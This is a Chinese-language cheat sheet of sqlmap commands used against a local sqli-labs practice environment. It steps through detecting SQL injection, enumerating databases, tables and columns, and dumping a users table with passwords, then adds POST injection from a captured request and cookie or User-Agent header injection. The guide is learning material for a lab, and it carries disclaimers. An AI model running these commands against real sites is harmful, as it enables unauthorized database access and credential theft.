仅供交流学习使用,请勿用于非法用途
python
1)检测url存在漏洞情况:python sqlmap.py -u "http://192.168.88.128/sqli-labs-master/Less-1/?id=1"
2)获取所有数据库名称:python sqlmap.py -u "http://192.168.88.128/sqli-labs-master/Less-1/?id=1" --dbs
3)获取指定库的所有表名:python sqlmap.py -u "http://192.168.88.128/sqli-labs-master/Less-1/?id=1" --tables -D security
4)获取当前数据库名是什么:python sqlmap.py -u "http://192.168.88.128/sqli-labs-master/Less-1/?id=1" --current-db
5)获取指定库指定表的所有字段:python sqlmap.py -u "http://192.168.88.128/sqli-labs-master/Less-1/?id=1" --columns -D security -T users
6)!!!禁止使用!!!拖库:python sqlmap.py -u "http://192.168.88.128/sqli-labs-master/Less-1/?id=1" -C id,password,username -D security -T users --dump
以上为本地测试,请勿用于非法用途
环境,phpstudy搭建的sqli-labs
补充:
python
7)多参数时指定参数:python sqlmap.py -u "http://192.168.88.128/sqli-labs-master/Less-1/?id=1&page=1" -p page
或者:python sqlmap.py -u "http://192.168.88.128/sqli-labs-master/Less-1/?id=1&page=1" -p page --batch
其中 --batch 是自动化测试,需要选择,全部默认Y(注入过程可能比较久)
8)批量检测:python sqlmap.py -m C:\Users\Administrator\Desktop\url.txt
9)设置cookie(检测需要登录的url):python sqlmap.py -u "http://192.168.88.128/sqli-labs-master/Less-1/?id=1" --cookie "cookie内容" --dbs
10)随机使用一个User-agent头部,或者指定一个User-agent头部: 随机: --random-agent
指定:python sqlmap.py -u "http://192.168.88.128/sqli-labs-master/Less-1/?id=1" --user-agent="User-agent头部" --dbs
以上是get方式
以下是post方式
补充:
python
post注入(其他内容获取都一样):python sqlmap.py -r C:\Users\Administrator\Desktop\2.txt -p uname --dbs
2.txt文件内容:
xml
POST /sqli-labs-master/Less-11/ HTTP/1.1
Host: 192.168.88.128
User-Agent: 等等等
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 34
Origin: http://192.168.88.128
Connection: close
Referer: http://192.168.88.128/sqli-labs-master/Less-11/
Upgrade-Insecure-Requests: 1
uname=aaa&passwd=bbb&submit=Submit
此文件是burpsuite拦截的,至于怎么保存这个文件自己查询或者直接复制都是可以的
补充:
head头注入:可以是cookie或者User-Agent
python
head头注入:python sqlmap.py -u "http://192.168.88.128/sqli-labs-master/Less-20/" --cookie "uname=Dumb" --level 2 --dbs
--level:指定测试等级